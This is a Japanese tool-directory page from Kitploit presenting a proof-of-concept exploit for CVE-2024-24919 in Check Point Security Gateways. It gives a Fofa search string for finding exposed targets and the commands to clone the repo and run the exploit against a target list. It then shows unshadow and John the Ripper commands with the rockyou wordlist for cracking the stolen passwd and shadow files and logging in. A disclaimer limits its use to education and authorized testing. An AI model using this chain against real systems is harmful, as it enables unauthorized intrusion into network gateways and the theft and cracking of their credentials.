Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-24919 — POC - CVE-2024–24919 - Check Point Security Gateways | Kitploit
ツール/GitHubGitHub/verylazytech/cve-2024-24919
パスワードクラッキング脆弱性分析エクスプロイト情報収集ペネトレーションテスト学習と教育
GitHubverylazytech/cve-2024-24919

CVE-2024-24919

POC - CVE-2024–24919 - Check Point Security Gateways

リポジトリを見る
931年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

Check Point セキュリティゲートウェイの情報漏えい - CVE-2024-24919

My Shop Medium Github Buy Me A Coffee

インターネットに接続され、Remote Access VPN または Mobile Access ソフトウェアブレードが有効になっている Check Point セキュリティゲートウェイにおいて、攻撃者が特定の情報を読み取る可能性があります。この脆弱性を緩和するセキュリティ修正プログラムが公開されています。

詳細はこちら — CVE-2024-24919

免責事項: この Proof of Concept(POC)は、教育および倫理的なテスト目的のみで作成されています。事前の相互同意なしに標的を攻撃するためにこのツールを使用することは違法です。適用されるすべての地域、州、連邦の法律を遵守する責任はエンドユーザーにあります。開発者は一切の責任を負わず、このプログラムによって引き起こされた誤用や損害についても責任を負いません。

はじめに

ターゲットの探索

潜在的なターゲットを見つけるには、Fofa(Shodan.io に類似)を使用します:

  • Fofa Dork: app=”Check_Point-SSL-Network-Extender”

Alt text

まず、リポジトリをクローンします:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-24919

次に、ターゲットを選択し、list.txt ファイルに以下の形式で追加します:

  • https://ip_address

エクスプロイトを実行します:

root@kitploit:~
python3 CVE-2024-24919.py -l list.txt

出力は以下の2通りです:

失敗:

Alt text

成功:

Alt text

エクスプロイト実行後、passwd と shadow の両方のファイルが見つかったら、JohnTheRipper でハッシュのクラックを試せます。実行後には passwd と shadow の2つのファイルが生成されるので、それらを1つのファイルにマージしてクラックを試みます(私は rockyou.txt を使用しましたが、任意のパスワードワードリストで構いません):

root@kitploit:~
unshadow passwd shadow > unshadowed.txt 
root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Alt text

そして、ハッシュのクラックに成功したら、そのユーザーにログインできます!

ツールをダウンロード